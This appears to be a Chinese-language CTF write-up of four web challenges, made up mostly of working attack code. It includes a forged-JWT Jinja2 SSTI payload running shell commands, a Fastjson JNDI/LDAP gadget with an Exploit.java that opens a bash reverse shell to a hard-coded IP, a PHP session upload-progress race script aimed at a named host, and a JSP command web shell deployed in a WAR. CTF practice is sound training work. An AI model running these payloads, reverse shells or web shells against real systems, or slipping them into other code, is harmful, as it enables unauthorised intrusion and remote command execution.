ezpy
#app.py
from flask import Flask, request, render_template, render_template_string, make_response, redirect, Request, url_for
from cookie import *
import uuid
app = Flask(__name__)  # the WSGI application; every route below is registered on it
@app.route("/")
def index():
    """Serve the login form at the site root.

    Only renders ``login.html``; the form itself posts to ``/login``.
    """
    page = render_template("login.html")
    return page
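@app.route("/login", methods=["GET", "POST"])
def login():
    """Mint the session token and send the browser on to ``/flag``.

    POST: read ``user`` and ``passwd`` from the form (a missing field is a
    400, as before), build an HS256 JWT with the username, a fresh random
    ``uid``, the fixed role ``"guest"`` and an ``exp`` claim, store it in the
    ``token`` cookie for 30 minutes and redirect to ``flag``.
    GET: redirect to the login form at ``/`` (the original fell off the end
    of the function and returned ``None``, which Flask reports as a 500).

    Security notes (grounded in this file, not fixed here):
      * ``"CTf4r"`` is a hard-coded, five-character signing key.  It is short
        enough to recover offline by brute force, and whoever has it can
        forge a token with ``role: "admin"``.  The same literal is used by
        ``flag()``; it should live in configuration as a long random value.
      * The app has no user store: the password is never checked against
        anything.  Unlike the original it is no longer copied into the JWT,
        because a JWT is signed but *not* encrypted -- every claim is
        readable by whoever holds the cookie -- and nothing reads ``passwd``
        back out of it.
      * The original token carried no ``exp``; only the cookie's ``max_age``
        limited its life, so a stolen token verified forever.  ``exp`` now
        matches the cookie lifetime.  ``HttpOnly`` keeps page scripts from
        reading the cookie; ``secure`` is deliberately not set because the
        app serves plain HTTP on port 80.
    """
    import time

    if request.method != "POST":
        return redirect(url_for("index"))

    token_ttl = 1800  # seconds; cookie max_age and JWT exp agree on this
    user = request.form["user"]
    _ = request.form["passwd"]  # presence check only (400 if absent); never stored
    payload = {
        "user": user,
        "uid": str(uuid.uuid4()),
        "role": "guest",
        "exp": int(time.time()) + token_ttl,
    }
    response = make_response(redirect(url_for("flag")))
    response.set_cookie(
        "token",
        generate_jwt(payload, "CTf4r"),  # weak hard-coded key -- see docstring
        max_age=token_ttl,
        httponly=True,
    )
    return response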
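@app.route("/flag")
def flag():
    """Greet the admin, or refuse, based on the ``role`` claim of the ``token`` cookie.

    Returns a redirect to the login form when the cookie is absent or the JWT
    fails verification (bad signature, malformed, expired); the original let
    the decode error propagate as a 500.

    Security fix: the original rendered ``res.html`` and then fed the finished
    page to ``render_template_string`` a second time.  The page title is
    ``"Hello " + <user claim>``, and the user claim is attacker-controlled
    (anyone who recovers the signing key can forge it), so Jinja2 expressions
    placed in ``user`` were executed server-side -- template injection leading
    to RCE, e.g. ``{{url_for.__globals__.os.popen(...).read()}}``.  Rendering
    the template exactly once, with ``user`` as an ordinary auto-escaped
    variable, closes that.  The ``print(res)`` that dumped every claim to
    stdout on each request is also removed.
    """
    import jwt  # cookie.py already depends on PyJWT; explicit rather than via its star import

    token = request.cookies.get("token")
    if token is None:
        return redirect(url_for("index"))
    try:
        claims = verify_jwt(token, "CTf4r")  # same weak hard-coded key as login()
    except jwt.InvalidTokenError:
        return redirect(url_for("index"))

    if claims.get("role") == "admin":
        title = "Hello " + str(claims.get("user", ""))
        return render_template("res.html", title=title, content="Hello admin!")
    return render_template(
        "res.html", title="Permission denied", content="Sorry, you are not admin!"
    )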
if __name__ == "__main__":
    # Listen on every interface on the privileged HTTP port with the Werkzeug
    # debugger off (debug=False is what the original's debug=0 means).
    app.run(host="0.0.0.0", port=80, debug=False)
#cookie.py
import jwt
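def generate_jwt(payload, key, algorithm="HS256"):
    """Sign *payload* (a dict of claims) with *key* and return the compact JWT.

    ``algorithm`` defaults to ``"HS256"``, the only value the original used;
    it is a parameter so callers can choose another HMAC variant without
    editing this module.  The return type follows PyJWT: ``str`` on 2.x,
    ``bytes`` on 1.x -- which one is installed is not visible from this file.

    A JWT is signed, not encrypted: every claim is readable by whoever holds
    the token, so never put secrets such as passwords in *payload*.
    """
    return jwt.encode(payload, key=key, algorithm=algorithm)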
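def verify_jwt(mtext, key, algorithm="HS256"):
    """Verify the compact JWT *mtext* with *key* and return its claims dict.

    The accepted-algorithm list is pinned to the single value *algorithm*
    (default ``"HS256"``), so PyJWT rejects ``alg: none`` and any attempt to
    swap in a different algorithm.  Raises ``jwt.InvalidTokenError`` (or a
    subclass such as ``DecodeError`` / ``ExpiredSignatureError``) when the
    signature, structure or ``exp`` claim does not check out; passing
    ``None`` as *mtext* also raises.  Note that the strength of the check is
    only as good as *key* -- a short guessable key lets an attacker forge
    tokens that verify here.
    """
    return jwt.decode(mtext, key=key, algorithms=[algorithm])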
token 用 HS256 签名，密钥很短，可以离线爆破（对 cookie 里的 token 做字典/掩码爆破），得到密钥：CTf4r。拿到密钥后就能自己签一个 role 为 admin 的 token。
接着是 SSTI：/flag 路由把 render_template 渲染出来的页面又交给 render_template_string 渲染了一次，而页面标题里拼接了 token 中的 user 字段，所以把 user 设成 Jinja2 表达式即可执行：
url_for.__globals__.os.popen(request.args.a).read()
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoie3t1cmxfZm9yLl9fZ2xvYmFsc19fLm9zLnBvcGVuKHJlcXVlc3QuYXJncy5hKS5yZWFkKCl9fSIsInBhc3N3ZCI6InRlc3QiLCJ1aWQiOiJhOTU0YjczMS01NGFkLTRiMzUtOGUxMS04ZWM2OTcyN2Q3ZTYiLCJyb2xlIjoiYWRtaW4ifQ.expgqWwyhxIXTRDSIbEvMwmtKjUE-DANHW99Ul8la2M
/flag?a=cat flag（请求时带上伪造的 token cookie；空格在 URL 里会被编码成 %20）
soeasy
参考:https://cloud.tencent.com/developer/article/1553664
{
"name":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"x":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://175.24.73.30:9999/Exploit",
"autoCommit":true
}
}
Exploit.java
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
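/**
 * Class served to the target over the JNDI/LDAP reference above: the no-arg
 * constructor runs when the reference is resolved and opens a bash reverse
 * shell to the listener on 175.24.73.30:2333.
 *
 * Because the command redirects bash's own stdin/stdout/stderr to the TCP
 * socket, the stdout pipe read here normally stays empty; the loop only
 * drains whatever is printed before the redirect takes effect.
 *
 * Fix vs. the original: the reader (and the pipe beneath it) is now closed
 * by try-with-resources and the process destroyed in {@code finally}, so an
 * exception from {@code readLine()} or {@code waitFor()} no longer leaks
 * them.
 */
public class Exploit {
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "bash -i >& /dev/tcp/175.24.73.30/2333 0>&1"});
        try (BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()))) {
            String line;
            while ((line = reader.readLine()) != null) {
                System.out.println(line);
            }
            p.waitFor();
        } finally {
            p.destroy();
        }
    }

    /** Unused; the payload runs from the constructor, not from main. */
    public static void main(String[] args) throws Exception {
    }
}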
javac Exploit.java
python3 -m http.server 8080
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://175.24.73.30:8080/#Exploit 9999
DaLaBengBa
import io
import sys
import requests
import threading
sessid = "jan"         # PHPSESSID we force on the target; its session file is sess_<sessid>
sess_path = "/tmp"     # assumed session.save_path on the target -- TODO confirm
url = "http://f813a9ca.yunyansec.com/"
def WRITE(session):
    """Writer half of the PHP session-upload-progress race.

    Loops forever, POSTing a ~50 KiB dummy file together with a
    ``PHP_SESSION_UPLOAD_PROGRESS`` field whose value is PHP code.  While the
    upload is in flight PHP copies that value into ``sess_<sessid>``, which
    READ() tries to include before PHP cleans it up.  Runs as a daemon thread
    from main() and never returns.
    """
    # NOTE(review): file_get_contents('flag.php') discards its result, so only
    # the phpinfo() output is visible when the payload runs -- confirm that is
    # what the target needs (e.g. flag exposed through phpinfo).
    php_code = "<?=phpinfo();file_get_contents('flag.php');?>"
    while True:
        dummy = io.BytesIO(b"x" * 1024 * 50)
        session.post(
            url=url,
            data={"PHP_SESSION_UPLOAD_PROGRESS": php_code},
            files={"file": ("xxx.txt", dummy)},
            cookies={"PHPSESSID": sessid},
        )
def READ(session):
    """Reader half: keep requesting ``?doge[_filename]=<sess_path>/sess_<sessid>``.

    ``doge[_filename]`` is whatever parameter the target uses to include a
    file (the target code is not on this page).  The first time the included
    session file shows ``upload_progress_`` -- i.e. the payload was written
    and executed -- the response body is printed and the process exits;
    otherwise a retry marker is printed and the loop continues.
    """
    while True:
        resp = session.get(f"{url}?doge[_filename]={sess_path}/sess_{sessid}")
        if "upload_progress_" not in resp.text:
            print("++++++retry++++++")
            continue
        print(resp.text)
        sys.exit(0)
def main():
    """Start the writer thread, then run the reader in the foreground.

    Both halves share one requests.Session.  The writer is a daemon thread so
    the ``sys.exit(0)`` in READ() terminates the whole process.
    NOTE(review): requests.Session is not documented as thread-safe; it seems
    to work for this race, but confirm before reusing the pattern.
    """
    with requests.session() as shared:
        writer = threading.Thread(target=WRITE, args=(shared,), daemon=True)
        writer.start()
        READ(shared)
if __name__ == '__main__':
    main()  # runs until READ() wins the race and calls sys.exit(0)
Old But A Little New
参考:https://pianshen.com/article/38641854149/
生成war包:jar cvf shell.war shell.jsp
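<%@ page language="java" contentType="text/html; charset=GBK"
pageEncoding="UTF-8"%>
<%-- NOTE(review): contentType declares GBK while pageEncoding and the <meta>
     tag below say UTF-8; the response is sent as GBK, so the meta tag is
     misleading.  Left as in the original. --%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>一句话木马</title>
</head>
<body>
<%--
  Command page packed into shell.war for the writeup: when ?pwd=admin matches,
  run ?cmd=... through Runtime.exec (whitespace-split, no shell) and stream its
  stdout into a <pre> block.

  Fixes vs. the original:
    * decode only the `len` bytes actually read (new String(bytes, 0, len, "GBK"));
      the original decoded the whole 4092-byte buffer on every read, appending
      stale bytes from earlier chunks (or zeros) to the output;
    * out.print instead of out.println, so chunk boundaries no longer insert
      spurious newlines into the command output;
    * skip when cmd is missing (exec(null) threw a NullPointerException -> 500)
      and close the pipe in finally.
  Still true: the only access control is a fixed password, stderr is not
  captured, and the output is not HTML-escaped.  Throwaway tooling, not
  something to leave deployed.
--%>
<%
String cmd = request.getParameter("cmd");
if ("admin".equals(request.getParameter("pwd")) && cmd != null) {
    java.io.InputStream input = Runtime.getRuntime().exec(cmd).getInputStream();
    try {
        int len = -1;
        byte[] bytes = new byte[4092];
        out.print("<pre>");
        while ((len = input.read(bytes)) != -1) {
            out.print(new String(bytes, 0, len, "GBK"));
        }
        out.print("</pre>");
    } finally {
        input.close();
    }
}
%>
</body>
</html>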
传war包,拿flag
/shell/shell.jsp?pwd=admin&cmd=cat flag